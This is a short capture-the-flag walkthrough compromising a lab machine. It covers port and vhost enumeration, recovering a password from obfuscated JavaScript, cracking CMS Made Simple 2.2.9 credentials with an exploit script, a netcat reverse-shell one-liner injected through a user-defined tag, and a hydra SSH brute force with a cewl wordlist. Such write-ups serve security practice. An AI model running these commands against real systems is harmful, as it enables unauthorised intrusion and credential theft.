Nmap scan ports.
nmap -sV -p- -oN ports.log 192.168.33.136
Scan port 80, only index.html.
Visit port 8000, look like a cms site. Take care the upper-left, there is a username "email@example.com".
Click login, come to log in panel.
Check source code, notice login.js.
Check the source code of login.js.
Base64 decode the code, get original js code.
var _0xb5c3=["\x6A\x69\x6E\x6D\x6F\x72\x69","\x54\x68\x65\x20\x71\x75\x69\x63\x6B\x20\x62\x72\x6F\x77\x6E\x20\x66\x6F\x78\x20\x6A\x75\x6D\x70\x73\x20\x6F\x76\x65\x72\x20\x74\x68\x65\x20\x6C\x61\x7A\x79\x20\x64\x6F\x67","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65"]; var u=_0xb5c3; var string=_0xb5c3; var a=string[_0xb5c3](0); var b=string[_0xb5c3](36); var c=string[_0xb5c3](2); var d=string[_0xb5c3](8); var e=string[_0xb5c3](13); var f=string[_0xb5c3](12); var g=string[_0xb5c3](14); var h=string[_0xb5c3](40); var i=string[_0xb5c3](12); var p=String[_0xb5c3](a,b,c,d,e,f,g,h,i);
Run this piece of code online at https://playcode.io/new/, get a string, looks like a password.
Login with "jinmori" and the password we just got, come to admin panel.
Choose admin-->VOIP logs.
Get some sms encoded string.
Decrypt the string online at https://www.diafaan.com/sms-tutorials/gsm-modem-tutorial/online-sms-pdu-decoder/, get some hints.
ur new domain for WiFi testing is wireless.com Wireless Testing portal is open for authenticated users to test our internal network wireless.com Testing Portal has been shifted to port: 8080
Add wireless.com to /etc/hosts. Scan vhost of port 8080. Found testing.wireless.com, add to /etc/hosts too.
gobuster vhost -u http://wireless.com:8080 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
Gobuster scan port 80 through wireless.com again, now we can found a cms site. (Before, it is empty.)
gobuster dir -u http://wireless.com -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard
Now we have two places to check, first is wireless.com:80, second is testing.wireless.com:8080.
Let's first do port 80. It's a Cms Made Simple site.
Notice the version is 2.2.9.
Use the POC code to get username and password.
python 46635.py -u http://wireless.com --crack -w /usr/share/wordlists/rockyou.txt
Login with credentials, at Extentions-->User Defined Tags, Edit User Defined Tag, input shell code and click "Apply" --> "Run".
echo system("nc 192.168.33.128 2333|/bin/sh|nc 192.168.33.128 2444");
After we click run, we can get reverse shell, port 2333 is input, port 2444 to output.
Then we can upload a traditinal php reverse shell, and get interactive shell in one terminal.
The machine has only one user "coherer", and after a lot enum, www-data can not escalate to user "coherer".
Now let's back to port 8080. Visit it, we come to a bot app. Type "help", we can see some commands.
Input "logs", then we get a log file http://testing.wireless.com:8080/static/Network.data.
Check the content, there are several short stories in it.
Now we may create a dic form it.
cewl -d 1 http://testing.wireless.com:8080/static/Network.data > dic.txt
Brute force the ssh password of coherer with this dic.
hydra -l coherer -P dic.txt -t 64 192.168.33.136 ssh -f
Log in ssh, check group.
The last step is a classic lxd root privilege escalation. Just bypass it.